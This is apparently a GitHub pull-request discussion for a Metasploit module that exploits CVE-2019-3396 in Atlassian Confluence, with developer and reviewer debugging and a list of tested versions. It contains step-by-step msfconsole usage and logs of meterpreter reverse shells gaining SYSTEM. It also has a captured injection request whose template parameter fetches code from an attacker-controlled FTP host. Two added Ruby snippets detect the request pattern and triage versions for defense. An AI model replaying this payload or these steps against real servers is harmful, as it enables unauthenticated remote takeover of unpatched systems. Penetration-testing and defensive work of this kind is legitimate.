
Atlassian Confluence RCE exploit (CVE-2019-3396) #11717

Merged
merged 14 commits into from Apr 18, 2019

@rrockru
Contributor

commented Apr 12, 2019

Description

This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.

The vulnerability exists in the Widget Connector Macro, which allows injecting the "_template" parameter from the outside for some services, such as YouTube, Viddler, DailyMotion, etc.

The module has been tested on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using the Java, Windows and Linux meterpreter payloads.

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Vulnerable Application

Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.

Verification Steps

List the steps needed to make sure this thing works

  • Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
  • Start msfconsole
  • use exploit/multi/http/confluence_widget_connector
  • set RHOST <IP>
  • set RPORT <PORT>
  • set SRVHOST <HOST_IP>
  • check
  • You should see The target is vulnerable
  • exploit
  • You should get a meterpreter session.

Options

Scenario

Tested on Confluence 6.8.2 with Windows target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Java target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: confluence
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Linux target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

rrockru added some commits Apr 11, 2019

@rrockru

Contributor Author

commented Apr 12, 2019

Recreated pull request #11711 from a unique branch.

Review comment on modules/exploits/multi/http/confluence_widget_connector.rb (outdated):
# Returns a upload template.
#
# @return [String]
def get_upload_vm()

@bcoles

bcoles Apr 12, 2019

Contributor

Empty braces for method definitions, as used here, and elsewhere in this module, are unnecessary. They may also be considered bad style, and will raise Rubocop warnings.

@rrockru

rrockru Apr 12, 2019

Author Contributor

Removed.

Review comment on modules/exploits/multi/http/confluence_widget_connector.rb (outdated):
java_home = get_java_home_path

if java_home.blank?
fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')

@bcoles

bcoles Apr 12, 2019

Contributor

Would it be worth making this a user-configurable option?

@rrockru

rrockru Apr 12, 2019

Author Contributor

I don't think it would be worth making this a user-configurable option, as this path depends on the Confluence installation path, because the JRE is part of the Confluence package. The same applies to the temp folder path.


rrockru added some commits Apr 12, 2019

@asoto-r7 asoto-r7 self-assigned this Apr 12, 2019

@wvu-r7

Contributor

commented Apr 12, 2019

This is in @asoto-r7's very capable hands now! Thanks!

@asoto-r7

Contributor

commented Apr 12, 2019

Hi @rrockru, thanks for the module!

I've set up fresh Confluence test environments in both Linux (Ubuntu Desktop 16.04.6 LTS x64) and Windows (Win10 x64), but am having trouble getting the check or exploit methods to succeed. Let me walk through my steps and you can tell me where I'm going wrong.

  1. I'm downloading a Confluence trial from their website. Since you mentioned version 6.13.0, I started there, but I'll try others as well. I'm using the Windows 64-bit installer and the Linux 64-bit installer.
  2. I'm running the executable (using sudo on Linux), and running through the express installation.
  3. I registered a throwaway account and received an evaluation license key.
  4. I logged into the admin panel and clicked "Manage Apps" (http://localhost:8090/plugins/servlet/upm/manage/all). I confirmed that the "Widget Connector" is installed and activated. It came with version 3.1.2.
  5. I fired up your latest commit and launched a check:
msf5 exploit(multi/http/confluence_widget_connector) > set RHOSTS 192.168.199.152
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.199.148 
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
msf5 exploit(multi/http/confluence_widget_connector) > check

[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021 
[-] Failed to inject and execute code:
[*] 192.168.199.152:8090 - The target is not exploitable.
[*] Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows 
msf5 exploit(multi/http/confluence_widget_connector) > check

[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021 
[-] Failed to inject and execute code:
[*] 192.168.199.152:8090 - The target is not exploitable.
[*] Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > run

[-] Exploit failed: java/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
  6. Looking at the packet capture, the check is successfully reaching the host and receiving back an HTTP code 200. Two things might be odd with the response, so I'll include the headers (skipping a bunch of cruft in the middle) along with the tail end of the response:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 192.168.199.152:8090
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Origin: http://192.168.199.152:8090/
Content-Type: application/json; charset=UTF-8
Content-Length: 171

{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=dQw4w9WgXcQ","_template":"ftp://192.168.199.148:8021/uIzmacheck.vm"}}}
HTTP/1.1 200 
X-ASEN: SEN-L13440750
Set-Cookie: JSESSIONID=14628894E105A29F025C266F1D79B013; Path=/; HttpOnly
X-Content-Type-Options: nosniff
Content-Type: text/plain
Transfer-Encoding: chunked
Date: Fri, 12 Apr 2019 20:31:13 GMT

2000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
    <title>Preview Macro</title>

        
        
                        
    
            <meta http-equiv="X-UA-Compatible" content="IE=EDGE,chrome=IE7">
<meta charset="UTF-8">
<meta id="confluence-context-path" name="confluence-context-path" content="">
<meta id="confluence-base-url" name="confluence-base-url" content="http://localhost:8090">

<meta id="atlassian-token" name="atlassian-token" content="544b58a7fb1b29b248133607d2af9489ea011e2d">


[...]

</style>

<div class="widget-error">
    <span class="widget-link">www.youtube.com</span>
</div>

            </div>
        </div>
    </div>
        <!-- include system javascript resources -->
    
    

    <!-- end system javascript resources -->
</body>
</html>

0


Note the final few lines include a widget-error section which simply reads www.youtube.com. Additionally, there is a dangling 0 with some newlines at the end.

Looking at the packet capture, I see no attempt for the Confluence target to reach back to the attacker via the specified port 8021:

[image omitted: packet capture]

A few questions:

  • Do any of my verification steps look different from your setup?
  • Could you let me know if you see the widget-error or the dangling zero?
  • Should we set the default port to 8090, since that's the Confluence installed default, or leave it as 80, assuming it'll be externally accessible?

Thanks again for the module! I'm looking forward to landing it!
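For defenders reading the captured request above, the feature that stands out is a client-supplied "_template" parameter that names a remote resource. The following Ruby is an added example, not code from this pull request or from the Metasploit module: it walks request records in a constructed hash format (host, method, path, body; the format is an assumption for the example) and flags POSTs to /rest/tinymce/1/macro/preview whose widget macro carries a "_template" URL with a remote scheme. The first sample record mirrors the request body in the capture; the others are benign or malformed controls so the edge cases (no _template, non-URL _template, non-JSON body) are visible.

```ruby
# Added example, not code from this pull request or from the Metasploit
# module: flag macro-preview requests whose "_template" parameter names a
# remote resource, the shape of the captured request above.
require 'json'
require 'uri'

PREVIEW_PATH = '/rest/tinymce/1/macro/preview'.freeze
# Schemes the thread mentions being used to fetch a remote template (ftp://,
# https://); http is included for completeness.
REMOTE_SCHEMES = %w[ftp http https].freeze

# Returns the remote "_template" URL carried by a widget macro preview body,
# or nil when the body is not JSON, is not a widget macro, has no _template,
# or the _template value is not a URL with a remote scheme.
def external_template(body)
  data = begin
    JSON.parse(body)
  rescue JSON::ParserError, TypeError
    return nil
  end
  return nil unless data.is_a?(Hash)
  macro = data['macro']
  return nil unless macro.is_a?(Hash) && macro['name'] == 'widget'
  params = macro['params']
  return nil unless params.is_a?(Hash)
  template = params['_template']
  return nil unless template.is_a?(String)
  scheme = begin
    URI.parse(template).scheme
  rescue URI::InvalidURIError
    return nil
  end
  REMOTE_SCHEMES.include?(scheme.to_s.downcase) ? template : nil
end

# Walks request records (constructed format: :host, :method, :path, :body)
# and returns one finding per request that matches the pattern.
def flag_requests(requests)
  findings = []
  requests.each do |req|
    next unless req[:method] == 'POST' && req[:path] == PREVIEW_PATH
    template = external_template(req[:body].to_s)
    next if template.nil?
    findings << { host: req[:host], template: template }
  end
  findings
end

# Constructed sample records: the first mirrors the captured request in the
# thread; the rest are benign or malformed control cases.
SAMPLE_REQUESTS = [
  { host: '192.168.199.152:8090', method: 'POST', path: PREVIEW_PATH,
    body: '{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=dQw4w9WgXcQ","_template":"ftp://192.168.199.148:8021/uIzmacheck.vm"}}}' },
  { host: '192.168.199.152:8090', method: 'POST', path: PREVIEW_PATH,
    body: '{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=dQw4w9WgXcQ"}}}' },
  { host: '192.168.199.152:8090', method: 'GET', path: '/rest/api/content', body: '' },
  { host: '192.168.199.152:8090', method: 'POST', path: PREVIEW_PATH, body: 'not json' }
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_requests(SAMPLE_REQUESTS).each do |f|
    puts "#{f[:host]} sent a remote _template: #{f[:template]}"
  end
end
```

The check deliberately keys on the scheme rather than on the presence of "_template" alone; a stricter deployment could treat any client-supplied "_template" on this endpoint as worth a look, which is a one-line change in external_template.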

@rrockru

Contributor Author

commented Apr 13, 2019

Hi @asoto-r7. After analyzing the problem I found that the servers I used to check use Confluence based on Tomcat 8.0. It's strange, because a fresh install of Confluence is based on Tomcat 9.0 and I have the same problem with exploitation. Also I found that Tomcat was updated with Confluence version 6.10. I will try to bypass that limitation. But it seems that presently the exploit works only before Confluence v6.10.

@rrockru

Contributor Author

commented Apr 13, 2019

Hmmm... It's very strange. The module works fine with Confluence 6.10 and 6.11. Seems like the problem is somewhere else.

@asoto-r7

Contributor

commented Apr 16, 2019

@haydar68 : The exploit has not yet been integrated into the Framework, and there will be a delay before you'll see it in Kali. This forum is for development and contributor efforts only, but feel free to reach out to us on the Metasploit Slack and we'll walk you through getting it set up in advance:

http://metasploit.com/slack

@asoto-r7

Contributor

commented Apr 16, 2019

@rrockru: Thanks for the feedback. There are a few things I'd like to see; not all of these are required before we can land the module. I'll keep working on this myself as well, but feel free to knock any of these out as well.

It would be nice to:

  • Figure out why the module doesn't work on newer versions of Confluence

We definitely need to:

  • Clearly define which versions the module will work on by default
  • Move the .md documentation file to documentation/exploits/multi/http
  • Cleanup previous listeners, so the exploit can be run multiple times sequentially
  • Determine why some exploits fail with bad-config (see below)
msf5 exploit(multi/http/confluence_widget_connector) > set RHOSTS 192.168.199.152
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.199.148
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
msf5 exploit(multi/http/confluence_widget_connector) > set PAYLOAD windows/meterpreter/reverse_tcp

msf5 exploit(multi/http/confluence_widget_connector) > check
[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021
[+] 192.168.199.152:8090 - The target is vulnerable.
[*] Server stopped.

msf5 exploit(multi/http/confluence_widget_connector) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.199.148:4444
[*] Starting the FTP server.
[*] Started service listener on 192.168.199.148:8021

msf5 exploit(multi/http/confluence_widget_connector) > [*] Target being detected as: Windows 10
[-] Exploit aborted due to failure: bad-config: Selected module target does not match the actual target.
[*] Server stopped.

EDIT: I was able to fix the bad-config exception by modifying the way the target_platform_compat method checks for operating system matching. I've tested this for Windows 10, but will need to confirm that it also works for Linux and Java.

asoto-r7 added some commits Apr 16, 2019

@asoto-r7

Contributor

commented Apr 16, 2019

A few bugs I'm working through....

Misleading "connection timed out" messages

When a target refuses the connection (e.g. when specifying an invalid RPORT), the exploit reports that the connection timed out, which is unexpected:

[!] Connection timed out in #inject_template

nil response from get_target_platform

get_target_platform can return nil, which generates an exception. I'm not yet sure what triggers this condition, but we'll want to abort if it happens.

[-] Exploit failed: NoMethodError undefined method `downcase' for nil:NilClass
[*] Server stopped.
[*] Exploit completed, but no session was created.

I'm able to reproduce this in my Linux testing environment (Ubuntu Desktop 16.04 x64 with Confluence 6.6.11 running natively). The call to send_request_cgi within inject_template when querying the os.name via javaprop.vm is returning a nil object. I've seen this when the server returns an HTTP/503 Service Unavailable (for example, when Confluence hasn't been fully set up) and also when the RPORT isn't listening.

Incoming flood of Meterpreter connections

While debugging under repeated runs, I've noticed instances where I start getting a ton of callbacks on port 4444. This could easily be an issue with my testing environment, but I want to note it here in case anyone else sees the same thing:

msf5 exploit(multi/http/confluence_widget_connector) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.199.162:4444
[*] Starting the FTP server.
[*] Started service listener on 192.168.199.162:8021
[*] timeout = 20
[*] Target being detected as:

[*] Meterpreter session 1 opened (192.168.199.162:4444 -> 192.168.199.152:54716) at 2019-04-16 14:53:45 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 2 opened (192.168.199.162:4444 -> 192.168.199.152:54714) at 2019-04-16 14:53:46 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 3 opened (192.168.199.162:4444 -> 192.168.199.152:54715) at 2019-04-16 14:53:46 -0500
[*] Meterpreter session 4 opened (192.168.199.162:4444 -> 192.168.199.152:57272) at 2019-04-16 14:53:47 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 5 opened (192.168.199.162:4444 -> 192.168.199.152:54717) at 2019-04-16 14:53:47 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 6 opened (192.168.199.162:4444 -> 192.168.199.152:57273) at 2019-04-16 14:53:47 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 7 opened (192.168.199.162:4444 -> 192.168.199.152:57274) at 2019-04-16 14:53:48 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 8 opened (192.168.199.162:4444 -> 192.168.199.152:57275) at 2019-04-16 14:53:48 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152
[*] Meterpreter session 9 opened (192.168.199.162:4444 -> 192.168.199.152:57276) at 2019-04-16 14:53:48 -0500
[*] Sending stage (985320 bytes) to 192.168.199.152

It's possible (and even likely) that these are old payloads from previous attempts that are trying to re-establish connections. I'm not sure what we can do about this, but one significantly negative side effect is that these payloads are written to disk and don't seem like they can be cleaned up until the service restarts.

Testing status

Tested successfully on:
(EDIT: see my comment below)

@rrockru

Contributor Author

commented Apr 17, 2019

@asoto-r7 Thanks for your fixes. I'll use your recommendations in the future.

  • Figure out why the module doesn't work on newer versions of Confluence

Right now I am trying to determine what the problem is. I see that the vulnerability triggers on Confluence 6.12 and above, but in the logs I see some problem with fetching the resource from the URL. Its behaviour is the same for FTP and HTTPS resources. After some research I found that Tomcat's ParallelWebappClassLoader class is unable to find the resource by URL using WebappClassLoaderBase's function findResource(). This function always returns null.

@rrockru

Contributor Author

commented Apr 17, 2019

Confluence 6.12.0 on Ubuntu 16.04 x64 also works with both Linux and Java payload.

@rrockru

Contributor Author

commented Apr 17, 2019

Finally found the problem, as I think. Confluence 6.12 and below use Apache Felix Framework 4.2.1, which registers an additional loader named http://felix.extensions:9/ to ClasspathResourceLoader. This loader allows working with external schemas like ftp://, https://, etc. In Confluence 6.13 and above Apache Felix Framework is upgraded to version 5.6.10, which doesn't register the loader. And that is the reason why the exploit doesn't work with Confluence 6.13 and above.

@busterb

Member

commented Apr 17, 2019

Thanks, that's a reasonable explanation.

@asoto-r7

Contributor

commented Apr 18, 2019

Awesome. Thanks @rrockru for the follow up explanation. Supposedly later versions are vulnerable, but they may not be exploitable. In any event, let's get this landed.

Testing Status

According to the CVE, this affects Confluence versions:

  • from 6.0.0 before 6.6.12,
  • from 6.7.0 before 6.12.3,
  • from 6.13.0 before 6.13.3, and
  • from 6.14.0 before 6.14.2.

In my testing, the exploit works reliably and stably against:

  • Confluence 6.6.11 (native Windows)
  • Confluence 6.0.1 (native Linux)
  • Confluence 6.2.0 (native Linux)
  • Confluence 6.3.1 (native Linux)
  • Confluence 6.4.0 (native Linux)
  • Confluence 6.5.0 (native Linux)
  • Confluence 6.6.0 (native Linux)
  • Confluence 6.6.11 (native Linux)
  • Confluence 6.7.0 (native Linux)
  • Confluence 6.7.1 (native Linux)
  • Confluence 6.7.3 (native Linux)
  • Confluence 6.8.0 (native Linux)
  • Confluence 6.8.5 (native Linux)
  • Confluence 6.9.0 (native Linux)
  • Confluence 6.9.3 (native Linux)
  • Confluence 6.10.0 (native Linux)
  • Confluence 6.10.2 (native Linux)
  • Confluence 6.11.0 (native Linux)
  • Confluence 6.11.2 (native Linux)
  • Confluence 6.12.0 (native Linux)
  • Confluence 6.12.0 (native Windows)
  • Confluence 6.12.2 (native Linux)

Exploit failed gracefully on non-vulnerable versions. The check says not exploitable and the exploit fails gracefully.

  • Confluence 6.12.3 (native Linux)
  • Confluence 6.12.3 (native Windows)
  • Confluence 6.12.4 (native Windows)
  • Confluence 6.13.3 (native Linux)
  • Confluence 6.13.3 (native Windows)
  • Confluence 6.13.4 (native Linux)
  • Confluence 6.13.4 (native Windows)
  • Confluence 6.14.2 (native Linux)
  • Confluence 6.14.2 (native Windows)
  • Confluence 6.14.3 (native Linux)
  • Confluence 6.15.2 (native Windows)

Exploit fails on some versions that should be vulnerable. The check says not exploitable and the exploit fails gracefully, but it should be vulnerable:

  • Confluence 6.13.0 (native Windows)
  • Confluence 6.13.0 (native Linux)
  • Confluence 6.13.1 (native Linux)
  • Confluence 6.13.2 (native Linux)
  • Confluence 6.14.0 (native Windows)
  • Confluence 6.14.0 (native Linux)
  • Confluence 6.14.1 (native Linux)
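The four affected ranges quoted from the CVE above (and in the Vulnerable Application section of the description) plus the testing results in this comment can be folded into a small inventory triage check. The Ruby below is an added example, not code from this pull request or from the Metasploit module. It encodes the advisory ranges as [first affected, first fixed), and separately records the thread's observation that the module's remote-template technique failed from 6.13.0 onward (rrockru's Apache Felix loader explanation), so an in-range version is reported either as one the thread exploited reliably or as one where the module's check failed. Hostnames and versions in SAMPLE_INVENTORY are constructed.

```ruby
# Added example, not code from this pull request or from the module:
# classify a Confluence version against the affected ranges quoted from
# the CVE above. Each range is [first affected, first fixed).
AFFECTED_RANGES = [
  %w[6.0.0 6.6.12],
  %w[6.7.0 6.12.3],
  %w[6.13.0 6.13.3],
  %w[6.14.0 6.14.2]
].freeze

# Per the thread, the module's technique stops working from 6.13.0 (Apache
# Felix 5.6.10 no longer registers the extension loader), although
# 6.13.0-6.13.2 and 6.14.0-6.14.1 are still inside the advisory's ranges.
MODULE_TECHNIQUE_LIMIT = '6.13.0'.freeze

# Parses "major.minor.patch" into integers; a shorter string is padded with
# zeros so that "6.13" compares as 6.13.0. Non-numeric input raises.
def parse_version(str)
  parts = str.to_s.strip.split('.')
  raise ArgumentError, "unexpected version format: #{str.inspect}" if parts.empty? || parts.length > 3
  nums = parts.map { |p| Integer(p, 10) }
  nums + [0] * (3 - nums.length)
end

# True when version a sorts strictly before version b.
def version_lt(a, b)
  (parse_version(a) <=> parse_version(b)) < 0
end

# True when the version falls inside any [lo, hi) affected range.
def affected?(version)
  AFFECTED_RANGES.any? { |lo, hi| !version_lt(version, lo) && version_lt(version, hi) }
end

# :outside_affected_ranges   - not in any advisory range (fixed release or
#                              a version the advisory does not list)
# :affected_module_confirmed - in range, and in the span the thread reports
#                              the module exploiting reliably (below 6.13.0)
# :affected_module_failed    - in range, but the thread reports the module's
#                              check failing on it (6.13.0 and above)
def triage(version)
  return :outside_affected_ranges unless affected?(version)
  version_lt(version, MODULE_TECHNIQUE_LIMIT) ? :affected_module_confirmed : :affected_module_failed
end

# Groups a constructed inventory ({hostname => version}) by triage result.
def summarise(inventory)
  inventory.each_with_object(Hash.new { |h, k| h[k] = [] }) do |(host, ver), acc|
    acc[triage(ver)] << host
  end
end

# Constructed sample inventory; the versions are ones the thread tested.
SAMPLE_INVENTORY = {
  'wiki-a.example' => '6.6.11',
  'wiki-b.example' => '6.12.3',
  'wiki-c.example' => '6.13.0',
  'wiki-d.example' => '6.14.1',
  'wiki-e.example' => '6.15.2'
}.freeze

if __FILE__ == $PROGRAM_NAME
  summarise(SAMPLE_INVENTORY).each do |status, hosts|
    puts "#{status}: #{hosts.join(', ')}"
  end
end
```

Note that :affected_module_failed is still an affected version by the advisory: the distinction only records what this module's check observed in the thread, so patch planning should go by affected? alone.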

@asoto-r7 asoto-r7 merged commit 06792f7 into rapid7:master Apr 18, 2019

3 checks passed:

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed.

asoto-r7 added a commit that referenced this pull request Apr 18, 2019

msjenkins-r7 added a commit that referenced this pull request Apr 18, 2019

@wvu-r7

Contributor

commented Apr 18, 2019

Release Notes

The multi/http/confluence_widget_connector exploit module has been added to the framework. This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro to execute arbitrary code (CVE-2019-3396). It affects Atlassian Confluence versions 6.0.0 before 6.6.12, from 6.7.0 before 6.12.3, from 6.13.0 before 6.13.3, and from 6.14.0 before 6.14.2. No authentication is required to exploit this vulnerability.

@rrockru

Contributor Author

commented Apr 18, 2019

Awesome! Thanks, guys!
